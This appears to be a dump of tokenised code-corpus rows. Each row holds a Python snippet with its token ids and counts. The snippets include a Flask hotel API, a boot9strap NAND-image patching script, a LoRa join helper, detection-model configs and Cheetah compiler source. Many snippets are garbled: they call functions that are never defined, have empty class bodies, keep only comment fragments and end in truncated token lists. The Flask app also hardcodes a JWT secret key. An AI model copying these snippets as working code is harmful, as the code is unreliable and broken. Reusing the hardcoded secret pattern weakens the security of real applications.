content
stringlengths
1
1.05M
input_ids
listlengths
1
883k
ratio_char_token
float64
1
22.9
token_count
int64
1
883k
import numpy as np import random import tensorflow as tf from shfl.data_base.data_base import shuffle_rows from shfl.data_distribution.data_distribution_sampling import SamplingDataDistribution
[ 11748, 299, 32152, 355, 45941, 198, 11748, 4738, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 198, 6738, 427, 2704, 13, 7890, 62, 8692, 13, 7890, 62, 8692, 1330, 36273, 62, 8516, 198, 6738, 427, 2704, 13, 7890, 62, 17080, 3890, 13,...
3.5
56
# -*- encoding: utf-8 -*- ''' @Time : 2021-06-08 @Author : EvilRecluse @Contact : https://github.com/RecluseXU @Desc : ''' # here put the import lib from pymongo import MongoClient from bson import ObjectId connection: MongoClient = MongoClient('mongodb://localhost:27017') collection = connection['local']['startup_log'] # # find: find find_one # collection.find # collection.find_one # mongo pymongo # mongo pymongo # filter # . SQLWHERE # _filter = {'pid': 4444} # pid4444 result = collection.find_one(_filter) print(result) # projection # # 1 # 0, 0 # _id s projection = {'_pid': 1, 'hostname': 1} result = collection.find_one(_filter, projection) print(result) collection.find_one({'_id': ObjectId('EvilMass-1619315049192')}) # _id # skip # result = collection.find(_filter, projection, skip=1) print(list(result)) # limit # result = collection.find(_filter, projection, limit=2) print(list(result)) # collection.count_documents # result = collection.count_documents({'_pid': 4444}) print(result)
[ 2, 532, 9, 12, 21004, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 7061, 6, 198, 31, 7575, 220, 220, 220, 1058, 220, 220, 33448, 12, 3312, 12, 2919, 198, 31, 13838, 220, 1058, 220, 220, 10461, 3041, 565, 1904, 198, 31, 17829, 1058, ...
2.625935
401
#!/usr/bin/env python3 import hashlib import os import shutil import subprocess import sys import time if not os.path.isfile('NAND.bin'): doexit('NAND.bin not found.', errcode=1) if os.path.isfile('firm0firm1.bak'): doexit('firm0firm1.bak was found.\n' 'In order to prevent writing a good backup with a bad one, the ' 'install has stopped. Please move or delete the old file if you ' 'are sure you want to continue. If you would like to restore, use ' '`restore-firm0firm1`.', errcode=1) if os.path.isfile('NAND-patched.bin'): doexit('NAND-patched.bin was found.\n' 'Please move or delete the patched NAND before patching another.', errcode=1) if not os.path.isfile('current.firm'): doexit('current.firm not found.', errcode=1) if not os.path.isfile('boot9strap.firm'): doexit('boot9strap.firm not found.', errcode=1) if not os.path.isfile('boot9strap.firm.sha'): doexit('boot9strap.firm.sha not found.', errcode=1) print('Verifying boot9strap.firm.') with open('boot9strap.firm.sha', 'rb') as f: b9s_hash = f.read(0x20) with open('boot9strap.firm', 'rb') as f: if hashlib.sha256(f.read(0x400000)).digest() != b9s_hash: doexit('boot9strap.firm hash check failed.', errcode=1) print('boot9strap.firm hash check passed.') readsize = 0x100000 # must be divisible by 0x3AF00000 and 0x4D800000 shutil.rmtree('work', ignore_errors=True) os.makedirs('work', exist_ok=True) overall_time = time.time() print('Trying to open NAND.bin...') with open('NAND.bin', 'rb+') as nand: print('Backing up FIRM0FIRM1 to firm0firm1.bin...') nand.seek(0xB130000) start_time = time.time() with open('firm0firm1.bak', 'wb') as f: for curr in range(0x800000 // readsize): f.write(nand.read(readsize)) print('Reading {:06X} ({:>5.1f}%)'.format((curr + 1) * readsize, (((curr + 1) * readsize) / 0x800000) * 100), end='\r') print('\nReading finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('Creating FIRMs to xor from boot9strap.firm.') start_time = time.time() with open('current.firm', 'rb') as f: with open('work/current_pad.bin', 'wb') as b9s: b9s.write(f.read(0x400000).ljust(0x400000, b'\0') * 2) with open('boot9strap.firm', 'rb') as f: with open('work/boot9strap_pad.bin', 'wb') as b9s: b9s.write(f.read(0x400000).ljust(0x400000, b'\0') * 2) print('Creation finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('XORing FIRM0FIRM1 with current.firm.') start_time = time.time() runcommand(['tools/lazyxor-' + sys.platform, 'firm0firm1.bak', 'work/current_pad.bin', 'work/xored.bin']) print('XORing finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('XORing FIRM0FIRM1 with boot9strap.firm.') start_time = time.time() runcommand(['tools/lazyxor-' + sys.platform, 'work/xored.bin', 'work/boot9strap_pad.bin', 'work/final.bin']) print('XORing finished in {:>.2f} seconds.\n'.format( time.time() - start_time)) print('Writing final FIRMs to NAND.bin.') with open('work/final.bin', 'rb') as f: firm_final = f.read(0x800000) nand.seek(0xB130000) start_time = time.time() for curr in range(0x800000 // readsize): print('Writing {:06X} ({:>5.1f}%)'.format((curr + 1) * readsize, (((curr + 1) * readsize) / 0x800000) * 100), end='\r') nand.write(bytes(firm_final[curr * readsize:(curr + 1) * readsize])) print('\nWriting finished in {:>.2f} seconds.'.format( time.time() - start_time)) os.rename('NAND.bin', 'NAND-patched.bin') doexit('boot9strap install process finished in {:>.2f} seconds.'.format( time.time() - overall_time))
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 12234, 8019, 198, 11748, 28686, 198, 11748, 4423, 346, 198, 11748, 850, 14681, 198, 11748, 25064, 198, 11748, 640, 628, 198, 198, 361, 407, 28686, 13, 6978, 13, 4468, 5...
2.204059
1,774
import concurrent import time import math import sys import asyncio import logging from . import msg from .parse_error import ParseError from . import DEBUG_LEVEL logger = logging.getLogger(__name__) logger.setLevel(DEBUG_LEVEL)
[ 11748, 24580, 198, 11748, 640, 198, 11748, 10688, 198, 11748, 25064, 198, 11748, 30351, 952, 198, 11748, 18931, 198, 6738, 764, 1330, 31456, 198, 6738, 764, 29572, 62, 18224, 1330, 2547, 325, 12331, 198, 198, 6738, 764, 1330, 16959, 62, ...
3.295775
71
from common_clustering import CommonClustering #clustering_features = CommonClustering(r'C:\Users\ivangarrera\Desktop\T2_cleaned.csv') clustering_features = CommonClustering('D:\Ing. Informatica\Cuarto\Machine Learning\T2_cleaned_gyroscope.csv') attr = list(clustering_features.data_set)[0][:list(clustering_features.data_set)[0].find('_')] clustering_features.attr = attr clustering_features.PrincipalComponentAnalysis(num_components=2) # Get the number of clusters that provides the best results ideal_number_of_clusters = clustering_features.getBestNumberOfClusters() # Plot silhuettes array clustering_features.PlotSilhouettes() # Print k-means with the best number of clusters that have been found labels = clustering_features.KMeansWithIdeal(ideal_number_of_clusters) # Interprate k-means groups clustering_features.data_set['labels'] = labels data_set_labels_mean = clustering_features.data_set.groupby(['labels']).mean() # Plot 3D graph to interpretate k-means groups import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = Axes3D(fig) ax.scatter(data_set_labels_mean.values[:,0], data_set_labels_mean.values[:,1], data_set_labels_mean.values[:,2]) plt.savefig(r'../../reports/figures/centroids3D_{}.png'.format(attr)) plt.show() # Agglomerative clustering algorithm using nearest neighbors matrix clustering_features.AgglomerativeClusteringWithNearestNeighbors() # DBSCAN Clustering algorithm labels = clustering_features.DBSCANClustering() # Interprate outliers clustering_features.data_set['labels'] = labels data_set_outliers = clustering_features.data_set.loc[(clustering_features.data_set['labels'] == -1)] # Show outliers in a 3D graph with all points in the dataset fig = plt.figure() ax = Axes3D(fig) ax.scatter(clustering_features.data_set.values[:,0], clustering_features.data_set.values[:,1], clustering_features.data_set.values[:,2]) ax.scatter(data_set_outliers.values[:,0], data_set_outliers.values[:,1], data_set_outliers.values[:,2], c='red', s=50) plt.savefig(r'../../reports/figures/outliers3D_{}.png'.format(attr)) plt.show()
[ 6738, 2219, 62, 565, 436, 1586, 1330, 8070, 2601, 436, 1586, 198, 198, 2, 565, 436, 1586, 62, 40890, 796, 8070, 2601, 436, 1586, 7, 81, 6, 34, 7479, 14490, 59, 452, 648, 9624, 430, 59, 36881, 59, 51, 17, 62, 2375, 22739, 13, 406...
2.646845
824
from blacklist import BLACKLIST from flask import Flask, jsonify from flask_restful import Api from resources.hotel import Hoteis, Hotel from resources.user import User, UserLogin, UserLogout, UserRegister, Users from resources.site import Site, Sites from flask_jwt_extended import JWTManager app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False app.config['JWT_SECRET_KEY'] = 'Jbs8aGbbAyt7iMa878Pnsj' app.config['JWT_BLACKLIST_ENABLED'] = True api = Api(app) jwt = JWTManager(app) # Hotels resource api.add_resource(Hoteis, '/hoteis') api.add_resource(Hotel, '/hoteis/<string:hotel_id>') # Users resource api.add_resource(Users, '/users') api.add_resource(User, '/users/<string:user_id>') # User register resource api.add_resource(UserRegister, '/register') # Login resource api.add_resource(UserLogin, '/login') # Logout resource api.add_resource(UserLogout, '/logout') # Sites resource api.add_resource(Sites, '/sites') api.add_resource(Site, '/sites/<string:site_url>') if __name__ == '__main__': from database.sql_alchemy import db db.init_app(app) app.run(debug=True)
[ 6738, 38810, 1330, 31963, 45849, 198, 6738, 42903, 1330, 46947, 11, 33918, 1958, 198, 6738, 42903, 62, 2118, 913, 1330, 5949, 72, 198, 6738, 4133, 13, 8940, 417, 1330, 367, 1258, 271, 11, 12696, 198, 6738, 4133, 13, 7220, 1330, 11787, ...
2.7471
431
# -*- coding: utf-8 -*- """Top-level package for Music Downloader Telegram Bot.""" # version as tuple for simple comparisons VERSION = (0, 9, 16) __author__ = """George Pchelkin""" __email__ = 'george@pchelk.in' # string created from tuple to avoid inconsistency __version__ = ".".join([str(x) for x in VERSION])
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 9126, 12, 5715, 5301, 329, 7849, 10472, 263, 50203, 18579, 526, 15931, 198, 198, 2, 2196, 355, 46545, 329, 2829, 17909, 198, 43717, 796, 357, 15, 11, 860, ...
3.038462
104
import struct import pycom import time from network import LoRa def setUSFrequencyPlan(lora): """ Sets the frequency plan that matches the TTN gateway in the USA """ # remove all US915 channels for channel in range(0, 72): lora.remove_channel(channel) # set all channels to the same frequency (must be before sending the OTAA join request) ttn_start_frequency = 903900000 ttn_step_frequency = 200000 ttn_ch8_frequency = 904600000 # Set up first 8 US915 TTN uplink channels for channel in range(0, 9): if (channel == 8): channel_frequency = ttn_ch8_frequency # DR3 = SF8/500kHz channel_dr_min = 4 channel_dr_max = 4 else: channel_frequency = ttn_start_frequency + \ (channel * ttn_step_frequency) # DR0 = SF10/125kHz channel_dr_min = 0 # DR3 = SF7/125kHz channel_dr_max = 3 lora.add_channel(channel, frequency=channel_frequency, dr_min=channel_dr_min, dr_max=channel_dr_max) print("Added channel", channel, channel_frequency, channel_dr_min, channel_dr_max) def join(app_eui, app_key, useADR): """ Join the Lorawan network using OTAA. new lora session is returned """ # Set the power to 20db for US915 # You can also set the default dr value but I found that was problematic # You need to turn on adr (auto data rate) at this point if it is to be used # only use adr for static devices (Not moving) # see https://lora-developers.semtech.com/library/tech-papers-and-guides/understanding-adr/ lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.US915, adr=useADR, tx_power=20) setUSFrequencyPlan(lora) print('Joining', end='') lora.join(activation=LoRa.OTAA, auth=(app_eui, app_key), timeout=0) # wait until the module has joined the network while not lora.has_joined(): time.sleep(2.5) blink(.5, 0xff8f00) # dark orange print('.', end='') print('') print('Joined') blink(2, 0x006400) # dark green return lora def send(lora, socket, port, payload, useADR): """ send data to the lorawan gateway on selected port """ blink(.5, 0x00008b) # dark blue socket.setblocking(True) socket.bind(port) print("Sending data:", payload.pack(), " Size:", payload.calcsize()) socket.send(payload.pack()) # Give send a extra second to be returned before switching # the socket blocking mode (May not need this) time.sleep(1) socket.setblocking(False) lora.nvram_save()
[ 11748, 2878, 198, 11748, 12972, 785, 198, 11748, 640, 198, 6738, 3127, 1330, 6706, 21762, 628, 198, 198, 4299, 900, 2937, 37, 28707, 20854, 7, 4685, 64, 2599, 198, 220, 220, 220, 37227, 21394, 262, 8373, 1410, 326, 7466, 262, 26653, 4...
2.410584
1,096
_base_ = [ '../_base_/models/retinanet_r50_fpn.py', '../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py' ] cudnn_benchmark = True norm_cfg = dict(type='BN', requires_grad=True) checkpoint = 'https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32-aa_in1k_20220119-5b4887a0.pth' # noqa model = dict( backbone=dict( _delete_=True, type='EfficientNet', arch='b3', drop_path_rate=0.2, out_indices=(3, 4, 5), frozen_stages=0, norm_cfg=dict( type='SyncBN', requires_grad=True, eps=1e-3, momentum=0.01), norm_eval=False, init_cfg=dict( type='Pretrained', prefix='backbone', checkpoint=checkpoint)), neck=dict( in_channels=[48, 136, 384], start_level=0, out_channels=256, relu_before_extra_convs=True, no_norm_on_lateral=True, norm_cfg=norm_cfg), bbox_head=dict(type='RetinaSepBNHead', num_ins=5, norm_cfg=norm_cfg), # training and testing settings train_cfg=dict(assigner=dict(neg_iou_thr=0.5))) # dataset settings img_norm_cfg = dict( mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) img_size = (896, 896) train_pipeline = [ dict(type='LoadImageFromFile'), dict(type='LoadAnnotations', with_bbox=True), dict( type='Resize', img_scale=img_size, ratio_range=(0.8, 1.2), keep_ratio=True), dict(type='RandomCrop', crop_size=img_size), dict(type='RandomFlip', flip_ratio=0.5), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size=img_size), dict(type='DefaultFormatBundle'), dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']), ] test_pipeline = [ dict(type='LoadImageFromFile'), dict( type='MultiScaleFlipAug', img_scale=img_size, flip=False, transforms=[ dict(type='Resize', keep_ratio=True), dict(type='RandomFlip'), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size=img_size), dict(type='ImageToTensor', keys=['img']), dict(type='Collect', keys=['img']), ]) ] data = dict( samples_per_gpu=4, workers_per_gpu=4, train=dict(pipeline=train_pipeline), val=dict(pipeline=test_pipeline), test=dict(pipeline=test_pipeline)) # optimizer optimizer_config = dict(grad_clip=None) optimizer = dict( type='SGD', lr=0.04, momentum=0.9, weight_decay=0.0001, paramwise_cfg=dict(norm_decay_mult=0, bypass_duplicate=True)) # learning policy lr_config = dict( policy='step', warmup='linear', warmup_iters=1000, warmup_ratio=0.1, step=[8, 11]) # runtime settings runner = dict(type='EpochBasedRunner', max_epochs=12) # NOTE: This variable is for automatically scaling LR, # USER SHOULD NOT CHANGE THIS VALUE. default_batch_size = 32 # (8 GPUs) x (4 samples per GPU)
[ 62, 8692, 62, 796, 685, 198, 220, 220, 220, 705, 40720, 62, 8692, 62, 14, 27530, 14, 1186, 259, 272, 316, 62, 81, 1120, 62, 69, 21999, 13, 9078, 3256, 198, 220, 220, 220, 705, 40720, 62, 8692, 62, 14, 19608, 292, 1039, 14, 66, ...
2.137733
1,394
#!/usr/bin/env python import datetime import mock import mom
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 4818, 8079, 198, 11748, 15290, 198, 198, 11748, 1995, 628, 628, 198 ]
2.913043
23
import os import json STOPWORDS_JSON_PATH = os.path.join( os.path.dirname(os.path.abspath(__file__)), os.pardir, "corpora/stopwords.json" ) with open(STOPWORDS_JSON_PATH, "r", encoding="utf-8") as f: STOPWORD = json.load(f)["stopwords"]
[ 11748, 28686, 198, 11748, 33918, 198, 198, 2257, 3185, 45359, 5258, 62, 40386, 62, 34219, 796, 28686, 13, 6978, 13, 22179, 7, 198, 220, 220, 220, 28686, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 834, 7753, ...
2.330189
106
from __future__ import absolute_import, division, print_function import pytest from .. import message as msg
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 11, 7297, 11, 3601, 62, 8818, 198, 198, 11748, 12972, 9288, 198, 198, 6738, 11485, 1330, 3275, 355, 31456, 628, 628 ]
3.931034
29
# -*- coding: utf-8 -*- import os import util from fabric.api import * from fabric.state import output from fabric.colors import * from base import BaseTask from helper.print_helper import task_puts collect = CollectConfig()
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 28686, 198, 11748, 7736, 198, 6738, 9664, 13, 15042, 1330, 1635, 198, 6738, 9664, 13, 5219, 1330, 5072, 198, 6738, 9664, 13, 4033, 669, 1330, 1635, 198, 198, 6738...
3.289855
69
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest import numpy as np from inference_pass_test import InferencePassTest import paddle.fluid as fluid import paddle.fluid.core as core from paddle.fluid.core import AnalysisConfig if __name__ == "__main__": unittest.main()
[ 2, 15069, 357, 66, 8, 12131, 350, 37382, 47, 37382, 46665, 13, 1439, 6923, 33876, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845...
3.629787
235
import argparse import os import shutil from tqdm import tqdm import logging from src.utils.common import read_yaml, create_directories import random from src.utils.model import log_model_summary import tensorflow as tf STAGE= "Base Model Creation" logging.basicConfig( filename=os.path.join("logs",'running_logs.log'), level=logging.INFO, format="[%(asctime)s: %(levelname)s: %(module)s]: %(message)s", filemode="a") if __name__=="__main__": args=argparse.ArgumentParser() args.add_argument("--config", "-c", default="configs/config.yaml") parsed_args=args.parse_args() try: logging.info("\n*********************") logging.info(f">>>>>>>stage {STAGE} started <<<<<<<") main(config_path=parsed_args.config) logging.info(f">>>>>>>> stage {STAGE} completed! <<<<<<<<\n") except Exception as e: logging.exception(e) raise e
[ 11748, 1822, 29572, 198, 11748, 28686, 198, 11748, 4423, 346, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 11748, 18931, 198, 6738, 12351, 13, 26791, 13, 11321, 1330, 1100, 62, 88, 43695, 11, 2251, 62, 12942, 1749, 198, 11748, ...
2.547486
358
import unittest # https://docs.python.org/3/library/unittest.html from modules.calculator import Calculator as Calc
[ 11748, 555, 715, 395, 1303, 3740, 1378, 31628, 13, 29412, 13, 2398, 14, 18, 14, 32016, 14, 403, 715, 395, 13, 6494, 198, 6738, 13103, 13, 9948, 3129, 1352, 1330, 43597, 355, 2199, 66, 628 ]
3.342857
35
#!/usr/bin/env python3 # # main.py # # Command-line utility for interacting with PSU Controller in PDDF mode in SONiC # try: import sys import os import click from tabulate import tabulate from utilities_common.util_base import UtilHelper except ImportError as e: raise ImportError("%s - required module not found" % str(e)) VERSION = '2.0' SYSLOG_IDENTIFIER = "psuutil" PLATFORM_SPECIFIC_MODULE_NAME = "psuutil" PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil" # Global platform-specific psuutil class instance platform_psuutil = None platform_chassis = None # Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs # ==================== CLI commands and groups ==================== # This is our main entrypoint - the main 'psuutil' command # 'version' subcommand # 'numpsus' subcommand # 'status' subcommand # 'mfrinfo' subcommand # 'seninfo' subcommand if __name__ == '__main__': cli()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 198, 2, 1388, 13, 9078, 198, 2, 198, 2, 9455, 12, 1370, 10361, 329, 24986, 351, 48189, 22741, 287, 14340, 8068, 4235, 287, 311, 1340, 72, 34, 198, 2, 198, 198, 28311, 25, ...
2.9625
320
from rest_framework import serializers from versatileimagefield.serializers import VersatileImageFieldSerializer from .models import Image, AnimatedGif
[ 6738, 1334, 62, 30604, 1330, 11389, 11341, 198, 198, 6738, 21362, 9060, 3245, 13, 46911, 11341, 1330, 18535, 12610, 5159, 15878, 32634, 7509, 198, 198, 6738, 764, 27530, 1330, 7412, 11, 36492, 38, 361, 628, 198 ]
4.333333
36
# # coordmap.py -- coordinate mappings. # # This is open-source software licensed under a BSD license. # Please see the file LICENSE.txt for details. # from ginga import trcalc from ginga.util import wcs from ginga.util.six.moves import map __all__ = ['CanvasMapper', 'DataMapper', 'OffsetMapper', 'WCSMapper'] #END
[ 2, 198, 2, 6349, 8899, 13, 9078, 1377, 20435, 285, 39242, 13, 198, 2, 198, 2, 770, 318, 1280, 12, 10459, 3788, 11971, 739, 257, 347, 10305, 5964, 13, 198, 2, 4222, 766, 262, 2393, 38559, 24290, 13, 14116, 329, 3307, 13, 198, 2, ...
2.867257
113
# coding: utf-8 # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import paddle import paddle.nn as nn import importlib from visualdl import LogWriter import numpy as np import pickle from models import utils from config import parser_args if __name__ == '__main__': args = parser_args() utils.seed_paddle(args.seed) if not args.high_level_api: train_model(args) else: train_hl_api(args)
[ 2, 19617, 25, 3384, 69, 12, 23, 201, 198, 2, 15069, 357, 66, 8, 33448, 350, 37382, 47, 37382, 46665, 13, 1439, 6923, 33876, 13, 201, 198, 201, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, ...
3.091185
329
import os from . import common import cv2 import numpy as np import imageio import torch import torch.utils.data as data
[ 11748, 28686, 198, 198, 6738, 764, 1330, 2219, 198, 198, 11748, 269, 85, 17, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 2939, 952, 198, 198, 11748, 28034, 198, 11748, 28034, 13, 26791, 13, 7890, 355, 1366, 628 ]
3.289474
38
from .contact_submission_resource import ContactSubmissionResource
[ 6738, 764, 32057, 62, 7266, 3411, 62, 31092, 1330, 14039, 7004, 3411, 26198, 198 ]
4.785714
14
# -*- coding: utf-8 -*- # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __author__ = 'ericbidelman@chromium.org (Eric Bidelman)' import collections import json import logging import os import webapp2 import yaml # Appengine imports. from google.appengine.api import memcache import common import models import settings import util from schedule import construct_chrome_channels_details # Add user to component subscribers. def post(self, path): params = json.loads(self.request.body) self.__update_subscribers_list(True, user_id=params.get('userId'), blink_component=params.get('componentName'), primary=params.get('primary')) # memcache.flush_all() # memcache.delete('%s|blinkcomponentowners' % (settings.MEMCACHE_KEY_PREFIX)) self.response.set_status(200, message='User added to subscribers') return self.response.write(json.dumps(params)) class SubscribersHandler(common.ContentHandler): app = webapp2.WSGIApplication([ ('/admin/blink/populate_subscribers', PopulateSubscribersHandler), ('/admin/subscribers(.*)', SubscribersHandler), ('(.*)', BlinkHandler), ], debug=settings.DEBUG)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 15069, 2177, 3012, 3457, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 4943, 198, 2, 345, 743, 407, 779, 428, ...
3.012195
574
from OBlog import database as db from flask import g, current_app import re import os
[ 6738, 440, 42383, 1330, 6831, 355, 20613, 201, 198, 6738, 42903, 1330, 308, 11, 1459, 62, 1324, 201, 198, 11748, 302, 201, 198, 201, 198, 201, 198, 201, 198, 201, 198, 201, 198, 201, 198, 11748, 28686, 201, 198, 201, 198, 201, 198, ...
2.188679
53
#!/usr/bin/env python # $Id: Compiler.py,v 1.148 2006/06/22 00:18:22 tavis_rudd Exp $ """Compiler classes for Cheetah: ModuleCompiler aka 'Compiler' ClassCompiler MethodCompiler If you are trying to grok this code start with ModuleCompiler.__init__, ModuleCompiler.compile, and ModuleCompiler.__getattr__. Meta-Data ================================================================================ Author: Tavis Rudd <tavis@damnsimple.com> Version: $Revision: 1.148 $ Start Date: 2001/09/19 Last Revision Date: $Date: 2006/06/22 00:18:22 $ """ __author__ = "Tavis Rudd <tavis@damnsimple.com>" __revision__ = "$Revision: 1.148 $"[11:-2] import sys import os import os.path from os.path import getmtime, exists import re import types import time import random import warnings import __builtin__ import copy from Cheetah.Version import Version, VersionTuple from Cheetah.SettingsManager import SettingsManager from Cheetah.Parser import Parser, ParseError, specialVarRE, \ STATIC_CACHE, REFRESH_CACHE, SET_LOCAL, SET_GLOBAL,SET_MODULE from Cheetah.Utils.Indenter import indentize # an undocumented preprocessor from Cheetah import ErrorCatchers from Cheetah import NameMapper from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList VFFSL=valueFromFrameOrSearchList VFSL=valueFromSearchList VFN=valueForName currentTime=time.time DEFAULT_COMPILER_SETTINGS = { ## controlling the handling of Cheetah $placeholders 'useNameMapper': True, # Unified dotted notation and the searchList 'useSearchList': True, # if false, assume the first # portion of the $variable (before the first dot) is a global, # builtin, or local var that doesn't need # looking up in the searchlist BUT use # namemapper on the rest of the lookup 'allowSearchListAsMethArg': True, 'useAutocalling': True, # detect and call callable()'s, requires NameMapper 'useStackFrames': True, # use NameMapper.valueFromFrameOrSearchList # rather than NameMapper.valueFromSearchList 'useErrorCatcher':False, 'alwaysFilterNone':True, # filter out None, before the filter is called 'useFilters':True, # use str instead if =False 'includeRawExprInFilterArgs':True, #'lookForTransactionAttr':False, 'autoAssignDummyTransactionToSelf':False, 'useKWsDictArgForPassingTrans':True, ## controlling the aesthetic appearance / behaviour of generated code 'commentOffset': 1, # should shorter str constant chunks be printed using repr rather than ''' quotes 'reprShortStrConstants': True, 'reprNewlineThreshold':3, 'outputRowColComments':True, # should #block's be wrapped in a comment in the template's output 'includeBlockMarkers': False, 'blockMarkerStart':('\n<!-- START BLOCK: ',' -->\n'), 'blockMarkerEnd':('\n<!-- END BLOCK: ',' -->\n'), 'defDocStrMsg':'Autogenerated by CHEETAH: The Python-Powered Template Engine', 'setup__str__method': False, 'mainMethodName':'respond', 'mainMethodNameForSubclasses':'writeBody', 'indentationStep': ' '*4, 'initialMethIndentLevel': 2, 'monitorSrcFile':False, 'outputMethodsBeforeAttributes': True, ## customizing the #extends directive 'autoImportForExtendsDirective':True, 'handlerForExtendsDirective':None, # baseClassName = handler(compiler, baseClassName) # a callback hook for customizing the # #extends directive. It can manipulate # the compiler's state if needed. # also see allowExpressionsInExtendsDirective # input filtering/restriction # use lower case keys here!! 'disabledDirectives':[], # list of directive keys, without the start token 'enabledDirectives':[], # list of directive keys, without the start token 'disabledDirectiveHooks':[], # callable(parser, directiveKey) 'preparseDirectiveHooks':[], # callable(parser, directiveKey) 'postparseDirectiveHooks':[], # callable(parser, directiveKey) 'preparsePlaceholderHooks':[], # callable(parser) 'postparsePlaceholderHooks':[], # callable(parser) # the above hooks don't need to return anything 'expressionFilterHooks':[], # callable(parser, expr, exprType, rawExpr=None, startPos=None) # exprType is the name of the directive, 'psp', or 'placeholder'. all # lowercase. The filters *must* return the expr or raise an exception. # They can modify the expr if needed. 'templateMetaclass':None, # strictly optional. Only works with new-style baseclasses 'i18NFunctionName':'self.i18n', ## These are used in the parser, but I've put them here for the time being to ## facilitate separating the parser and compiler: 'cheetahVarStartToken':'$', 'commentStartToken':'##', 'multiLineCommentStartToken':'#*', 'multiLineCommentEndToken':'*#', 'gobbleWhitespaceAroundMultiLineComments':True, 'directiveStartToken':'#', 'directiveEndToken':'#', 'allowWhitespaceAfterDirectiveStartToken':False, 'PSPStartToken':'<%', 'PSPEndToken':'%>', 'EOLSlurpToken':'#', 'gettextTokens': ["_", "N_", "ngettext"], 'allowExpressionsInExtendsDirective': False, # the default restricts it to # accepting dotted names 'allowEmptySingleLineMethods': False, 'allowNestedDefScopes': True, 'allowPlaceholderFilterArgs': True, ## See Parser.initDirectives() for the use of the next 3 #'directiveNamesAndParsers':{} #'endDirectiveNamesAndHandlers':{} #'macroDirectives':{} } ################################################## ## METHOD COMPILERS ################################################## ## CLASS COMPILERS _initMethod_initCheetah = """\ if not self._CHEETAH__instanceInitialized: cheetahKWArgs = {} allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split() for k,v in KWs.items(): if k in allowedKWs: cheetahKWArgs[k] = v self._initCheetahInstance(**cheetahKWArgs) """.replace('\n','\n'+' '*8) ################################################## ## MODULE COMPILERS ################################################## ## Make Compiler an alias for ModuleCompiler Compiler = ModuleCompiler
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 720, 7390, 25, 3082, 5329, 13, 9078, 11, 85, 352, 13, 18294, 4793, 14, 3312, 14, 1828, 3571, 25, 1507, 25, 1828, 256, 23401, 62, 81, 4185, 5518, 720, 198, 37811, 7293, 5329, 609...
2.761398
2,347
# -*- coding: utf-8 -*- import compat import unittest import sys from plmn.utils import * from plmn.results import * from plmn.modem_cmds import * from plmn.simple_cmds import * if __name__ == '__main__': nargs = process_args() unittest.main(argv=sys.argv[nargs:], exit=False) Results.print_results()
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 8330, 198, 11748, 555, 715, 395, 198, 11748, 25064, 198, 198, 6738, 458, 10295, 13, 26791, 1330, 1635, 198, 6738, 458, 10295, 13, 43420, 1330, 1635, 198, 673...
2.536
